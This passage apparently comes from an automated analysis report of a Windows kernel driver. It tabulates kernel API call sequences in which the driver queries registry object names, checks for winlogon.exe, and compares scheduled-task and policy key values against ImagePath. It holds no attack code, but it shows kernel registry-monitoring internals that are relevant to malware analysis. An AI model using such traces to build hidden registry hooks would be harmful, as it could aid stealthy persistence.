| ObQueryNameString | Object_ptr = 0xffffc000b7bd5a40, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00029344c98, ret_val_out = 0xc0000004 |
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xac, ret_val_ptr_out = 0xffffe0003af7de90 |
| ObQueryNameString | Object_ptr = 0xffffc000b7bd5a40, Length = 0xac, ObjectNameInfo_unk_out = 0xffffe0003af7de90, ReturnLength_ptr_out = 0xffffd00029344c98, ret_val_out = 0x0 |
| RtlCopyUnicodeString | SourceString = \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry, DestinationString_out = \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry |
| ExFreePoolWithTag | P_ptr = 0xffffe0003af7de90, Tag = 0x0 |
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\USER\, ret_val_out = 0 |
| _wcsicmp | _String1 = \Software\Microsoft\Office\16.0\Common\ClientTelemetry, _String2 = \Software\Microsoft\Windows\CurrentVersion\Policies\System, ret_val_out = -8 |
| ExFreePoolWithTag | P_ptr = 0xffffe0003af7df50, Tag = 0x0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 |
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 |
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b78fea90, ret_val_out = 1 |
| ObQueryNameString | Object_ptr = 0xffffc000b78fea90, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00029344fb8, ret_val_out = 0xc0000004 |
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xa4, ret_val_ptr_out = 0xffffe0003af7df50 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b78fea90, ret_val_out = 1 |
| ObQueryNameString | Object_ptr = 0xffffc000b78fea90, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00029344c98, ret_val_out = 0xc0000004 |
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xa2, ret_val_ptr_out = 0xffffe0003af7de90 |
| ObQueryNameString | Object_ptr = 0xffffc000b78fea90, Length = 0xa2, ObjectNameInfo_unk_out = 0xffffe0003af7de90, ReturnLength_ptr_out = 0xffffd00029344c98, ret_val_out = 0x0 |
| RtlCopyUnicodeString | SourceString = \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\Common\ClientTelemetry, DestinationString_out = \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\Common\ClientTelemetry |
| ExFreePoolWithTag | P_ptr = 0xffffe0003af7de90, Tag = 0x0 |
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\USER\, ret_val_out = 0 |
| _wcsicmp | _String1 = \Software\Microsoft\Office\Common\ClientTelemetry, _String2 = \Software\Microsoft\Windows\CurrentVersion\Policies\System, ret_val_out = -8 |
| ExFreePoolWithTag | P_ptr = 0xffffe0003af7df50, Tag = 0x0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 |
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 |
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b6827830, ret_val_out = 1 |
| ObQueryNameString | Object_ptr = 0xffffc000b6827830, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00029344fb8, ret_val_out = 0xc0000004 |
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x8e, ret_val_ptr_out = 0xffffe0003a77c910 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b6827830, ret_val_out = 1 |
| ObQueryNameString | Object_ptr = 0xffffc000b6827830, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00029344c98, ret_val_out = 0xc0000004 |
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x8c, ret_val_ptr_out = 0xffffe0003a77c870 |
| ObQueryNameString | Object_ptr = 0xffffc000b6827830, Length = 0x8c, ObjectNameInfo_unk_out = 0xffffe0003a77c870, ReturnLength_ptr_out = 0xffffd00029344c98, ret_val_out = 0x0 |
| RtlCopyUnicodeString | SourceString = \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common, DestinationString_out = \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common |
| ExFreePoolWithTag | P_ptr = 0xffffe0003a77c870, Tag = 0x0 |
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\USER\, ret_val_out = 0 |
| _wcsicmp | _String1 = \Software\Microsoft\Office\16.0\Common, _String2 = \Software\Microsoft\Windows\CurrentVersion\Policies\System, ret_val_out = -8 |
| ExFreePoolWithTag | P_ptr = 0xffffe0003a77c910, Tag = 0x0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 |
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 |
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 |
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 |
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 |
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 |
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 |
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 |
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 |
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 |
Execution Path #157 (length: 160, count: 1, processes: 1)
»
| Information | Value |
|---|---|
| Sequence Length | 160 |
Processes
»
| Process | Count |
|---|---|
| Process 10 (svchost.exe, PID: 1000) | 1 |
Sequence
»
| Symbol | Parameters |
|---|---|
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0fcea0, ret_val_out = 1 |
| ObQueryNameString | Object_ptr = 0xffffc000ba0fcea0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002ed2b0d8, ret_val_out = 0xc0000004 |
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x110, ret_val_ptr_out = 0xffffe0003a7664d0 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0fcea0, ret_val_out = 1 |
| ObQueryNameString | Object_ptr = 0xffffc000ba0fcea0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002ed2adb8, ret_val_out = 0xc0000004 |
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x10e, ret_val_ptr_out = 0xffffe0003a769010 |
| ObQueryNameString | Object_ptr = 0xffffc000ba0fcea0, Length = 0x10e, ObjectNameInfo_unk_out = 0xffffe0003a769010, ReturnLength_ptr_out = 0xffffd0002ed2adb8, ret_val_out = 0x0 |
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{E5217668-D921-4907-8CE1-276EABA44515}, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{E5217668-D921-4907-8CE1-276EABA44515} |
| ExFreePoolWithTag | P_ptr = 0xffffe0003a769010, Tag = 0x0 |
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x26, ret_val_ptr_out = 0xffffe0003af83eb0 |
| _wcsicmp | _String1 = SecurityDescriptor, _String2 = ImagePath, ret_val_out = 10 |
| ExFreePoolWithTag | P_ptr = 0xffffe0003a7664d0, Tag = 0x0 |
| ExFreePoolWithTag | P_ptr = 0xffffe0003af83eb0, Tag = 0x0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0fcea0, ret_val_out = 1 |
| ObQueryNameString | Object_ptr = 0xffffc000ba0fcea0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002ed2b0d8, ret_val_out = 0xc0000004 |
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x110, ret_val_ptr_out = 0xffffe0003a7664d0 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0fcea0, ret_val_out = 1 |
| ObQueryNameString | Object_ptr = 0xffffc000ba0fcea0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002ed2adb8, ret_val_out = 0xc0000004 |
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x10e, ret_val_ptr_out = 0xffffe0003a769010 |
| ObQueryNameString | Object_ptr = 0xffffc000ba0fcea0, Length = 0x10e, ObjectNameInfo_unk_out = 0xffffe0003a769010, ReturnLength_ptr_out = 0xffffd0002ed2adb8, ret_val_out = 0x0 |
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{E5217668-D921-4907-8CE1-276EABA44515}, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{E5217668-D921-4907-8CE1-276EABA44515} |
| ExFreePoolWithTag | P_ptr = 0xffffe0003a769010, Tag = 0x0 |
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xe, ret_val_ptr_out = 0xffffe0003c634250 |
| _wcsicmp | _String1 = Source, _String2 = ImagePath, ret_val_out = 10 |
| ExFreePoolWithTag | P_ptr = 0xffffe0003a7664d0, Tag = 0x0 |
| ExFreePoolWithTag | P_ptr = 0xffffe0003c634250, Tag = 0x0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0fcea0, ret_val_out = 1 |
| ObQueryNameString | Object_ptr = 0xffffc000ba0fcea0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002ed2b0d8, ret_val_out = 0xc0000004 |
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x110, ret_val_ptr_out = 0xffffe0003a7664d0 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0fcea0, ret_val_out = 1 |
| ObQueryNameString | Object_ptr = 0xffffc000ba0fcea0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002ed2adb8, ret_val_out = 0xc0000004 |
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x10e, ret_val_ptr_out = 0xffffe0003a769010 |
| ObQueryNameString | Object_ptr = 0xffffc000ba0fcea0, Length = 0x10e, ObjectNameInfo_unk_out = 0xffffe0003a769010, ReturnLength_ptr_out = 0xffffd0002ed2adb8, ret_val_out = 0x0 |
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{E5217668-D921-4907-8CE1-276EABA44515}, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{E5217668-D921-4907-8CE1-276EABA44515} |
| ExFreePoolWithTag | P_ptr = 0xffffe0003a769010, Tag = 0x0 |
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xe, ret_val_ptr_out = 0xffffe0003c634250 |
| _wcsicmp | _String1 = Author, _String2 = ImagePath, ret_val_out = -8 |
| ExFreePoolWithTag | P_ptr = 0xffffe0003a7664d0, Tag = 0x0 |
| ExFreePoolWithTag | P_ptr = 0xffffe0003c634250, Tag = 0x0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0fcea0, ret_val_out = 1 |
| ObQueryNameString | Object_ptr = 0xffffc000ba0fcea0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002ed2b0d8, ret_val_out = 0xc0000004 |
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x110, ret_val_ptr_out = 0xffffe0003a7664d0 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0fcea0, ret_val_out = 1 |
| ObQueryNameString | Object_ptr = 0xffffc000ba0fcea0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002ed2adb8, ret_val_out = 0xc0000004 |
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x10e, ret_val_ptr_out = 0xffffe0003a769010 |
| ObQueryNameString | Object_ptr = 0xffffc000ba0fcea0, Length = 0x10e, ObjectNameInfo_unk_out = 0xffffe0003a769010, ReturnLength_ptr_out = 0xffffd0002ed2adb8, ret_val_out = 0x0 |
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{E5217668-D921-4907-8CE1-276EABA44515}, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{E5217668-D921-4907-8CE1-276EABA44515} |
| ExFreePoolWithTag | P_ptr = 0xffffe0003a769010, Tag = 0x0 |
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x18, ret_val_ptr_out = 0xffffe0003c634190 |
| _wcsicmp | _String1 = Description, _String2 = ImagePath, ret_val_out = -5 |
| ExFreePoolWithTag | P_ptr = 0xffffe0003a7664d0, Tag = 0x0 |
| ExFreePoolWithTag | P_ptr = 0xffffe0003c634190, Tag = 0x0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0fcea0, ret_val_out = 1 |
| ObQueryNameString | Object_ptr = 0xffffc000ba0fcea0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002ed2b0d8, ret_val_out = 0xc0000004 |
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x110, ret_val_ptr_out = 0xffffe0003a7664d0 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0fcea0, ret_val_out = 1 |
| ObQueryNameString | Object_ptr = 0xffffc000ba0fcea0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002ed2adb8, ret_val_out = 0xc0000004 |
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x10e, ret_val_ptr_out = 0xffffe0003a769010 |
| ObQueryNameString | Object_ptr = 0xffffc000ba0fcea0, Length = 0x10e, ObjectNameInfo_unk_out = 0xffffe0003a769010, ReturnLength_ptr_out = 0xffffd0002ed2adb8, ret_val_out = 0x0 |
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{E5217668-D921-4907-8CE1-276EABA44515}, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{E5217668-D921-4907-8CE1-276EABA44515} |
| ExFreePoolWithTag | P_ptr = 0xffffe0003a769010, Tag = 0x0 |
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x8, ret_val_ptr_out = 0xffffe0003c634250 |
| _wcsicmp | _String1 = URI, _String2 = ImagePath, ret_val_out = 12 |
| ExFreePoolWithTag | P_ptr = 0xffffe0003a7664d0, Tag = 0x0 |
| ExFreePoolWithTag | P_ptr = 0xffffe0003c634250, Tag = 0x0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0fcea0, ret_val_out = 1 |
| ObQueryNameString | Object_ptr = 0xffffc000ba0fcea0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002ed2b0d8, ret_val_out = 0xc0000004 |
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x110, ret_val_ptr_out = 0xffffe0003a7664d0 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0fcea0, ret_val_out = 1 |
| ObQueryNameString | Object_ptr = 0xffffc000ba0fcea0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002ed2adb8, ret_val_out = 0xc0000004 |
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x10e, ret_val_ptr_out = 0xffffe0003a769010 |
| ObQueryNameString | Object_ptr = 0xffffc000ba0fcea0, Length = 0x10e, ObjectNameInfo_unk_out = 0xffffe0003a769010, ReturnLength_ptr_out = 0xffffd0002ed2adb8, ret_val_out = 0x0 |
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{E5217668-D921-4907-8CE1-276EABA44515}, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{E5217668-D921-4907-8CE1-276EABA44515} |
| ExFreePoolWithTag | P_ptr = 0xffffe0003a769010, Tag = 0x0 |
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x12, ret_val_ptr_out = 0xffffe0003c634190 |
| _wcsicmp | _String1 = Triggers, _String2 = ImagePath, ret_val_out = 11 |
| ExFreePoolWithTag | P_ptr = 0xffffe0003a7664d0, Tag = 0x0 |
| ExFreePoolWithTag | P_ptr = 0xffffe0003c634190, Tag = 0x0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0fcea0, ret_val_out = 1 |
| ObQueryNameString | Object_ptr = 0xffffc000ba0fcea0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002ed2b0d8, ret_val_out = 0xc0000004 |
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x110, ret_val_ptr_out = 0xffffe0003a7664d0 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0fcea0, ret_val_out = 1 |
| ObQueryNameString | Object_ptr = 0xffffc000ba0fcea0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002ed2adb8, ret_val_out = 0xc0000004 |
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x10e, ret_val_ptr_out = 0xffffe0003a769010 |
| ObQueryNameString | Object_ptr = 0xffffc000ba0fcea0, Length = 0x10e, ObjectNameInfo_unk_out = 0xffffe0003a769010, ReturnLength_ptr_out = 0xffffd0002ed2adb8, ret_val_out = 0x0 |
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{E5217668-D921-4907-8CE1-276EABA44515}, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{E5217668-D921-4907-8CE1-276EABA44515} |
| ExFreePoolWithTag | P_ptr = 0xffffe0003a769010, Tag = 0x0 |
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x10, ret_val_ptr_out = 0xffffe0003c634250 |
| _wcsicmp | _String1 = Actions, _String2 = ImagePath, ret_val_out = -8 |
| ExFreePoolWithTag | P_ptr = 0xffffe0003a7664d0, Tag = 0x0 |
| ExFreePoolWithTag | P_ptr = 0xffffe0003c634250, Tag = 0x0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
Execution Path #189 (length: 187, count: 1, processes: 1 incomplete)
»
| Information | Value |
|---|---|
| Sequence Length | 187 |
Processes
»
| Process | Count |
|---|---|
| Process 10 (svchost.exe, PID: 1000) | 1 |
Sequence
»
| Symbol | Parameters |
|---|---|
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
